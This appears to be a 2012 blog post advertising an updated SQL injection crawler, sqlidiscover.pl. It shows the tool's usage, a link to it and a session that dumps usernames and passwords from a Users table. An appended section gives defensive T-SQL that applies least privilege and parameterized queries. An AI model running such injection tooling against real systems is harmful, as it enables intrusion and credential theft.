Sunday, 23 September 2012

MsSQL SQL Injection Data Crawling - Tool Updated

We've recently updated the sqlidiscover.pl tool, which enumerates SQL databases, tables, columns and data fields. The update adds support for sending a custom cookie with your requests.

http://blacksecurity.org/tools/42/sqlidiscover___MsSQL_SQL_Injection_Data_Crawler/124.html



sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL

-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN



Here's an actual example:

jinxy ~ # perl sqlidiscover.pl -c ASPSESSIONIDSSSTRCDB:KCMLJILCJGPBJELANCFHCNGL -v -G -iProductID http://www.example.com/catalog/view.asp
sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=KCMLJILCJGPBJELANCFHCNGL
[*] URL to process: http://www.example.com/catalog/view.asp
[*] Abusing 'ProductID'...

[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo


unknown_db.test> help
sqliinjection interactive session help

exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).

------------------------------------------------------------

unknown_db.test> select database demo
Changing context to demo.test

demo.test> select table Users

Changing context to demo.Users

demo.Users> discover columns

[*] Enumerating columns for table Users
[+] Column search: found: (0) AccountNumber
[+] Column search: found: (1) Address
[+] Column search: found: (2) Email
[+] Column search: found: (3) Name
[+] Column search: found: (4) Password
[+] Column search: found: (5) Phone
[+] Column search: found: (6) Username
[+] Column search finished, 6 found


demo.Users> fetch Username, Password, Name
[+] Using columns Username, Password, Name
[*] Retrieving information for table demo.Users
[+] 3 columns selected for data retrieval
| Username | Password | Name
| admin | demo | Demo
| superadmin | master | Master Admin
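
The session above reports the web application's database connection as dbo, which is why a single injectable parameter reaches every table in demo, including Users. The T-SQL below is an added example, not part of the original post or the tool: it gives that connection least privilege instead. It assumes SQL Server 2005 or later; the names web_catalog, dbo.Products (and its columns) and dbo.GetProduct are hypothetical.

```sql
-- Added example. demo and dbo.Users come from the session above;
-- web_catalog, dbo.Products, its columns and dbo.GetProduct are assumed names.
USE demo;
GO

-- 1. Dedicated login for the web application, replacing the dbo connection.
CREATE LOGIN web_catalog
    WITH PASSWORD = '<placeholder-strong-password>', CHECK_POLICY = ON;
CREATE USER web_catalog FOR LOGIN web_catalog;
GO

-- 2. The one lookup the catalog page needs, with ProductID as a typed parameter.
--    A non-numeric value fails type conversion instead of becoming SQL text.
CREATE PROCEDURE dbo.GetProduct
    @ProductID int
AS
BEGIN
    SET NOCOUNT ON;
    SELECT ProductID, Name, Price
    FROM dbo.Products
    WHERE ProductID = @ProductID;
END;
GO

-- 3. EXECUTE on that procedure only. Ownership chaining lets the procedure read
--    dbo.Products without the account holding SELECT on any table.
GRANT EXECUTE ON OBJECT::dbo.GetProduct TO web_catalog;
-- Explicit DENY so a later role grant cannot silently expose the credential table.
DENY SELECT ON OBJECT::dbo.Users TO web_catalog;
GO

-- 4. Audit: list every member of db_owner in this database.
SELECT m.name AS member_name
FROM sys.database_role_members AS rm
JOIN sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'db_owner';
GO

-- 5. Check the result from the application account's point of view.
EXECUTE AS USER = 'web_catalog';
SELECT name FROM sys.tables;                                  -- tables visible to it
SELECT HAS_PERMS_BY_NAME('dbo.Users', 'OBJECT', 'SELECT');    -- effective SELECT on Users
REVERT;
GO
```

The page itself still has to pass ProductID as a typed command parameter rather than concatenating it into the statement. SQL Server only shows a principal the metadata of objects it holds some permission on, so step 5 is a quick way to confirm what table enumeration through this account could reach.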
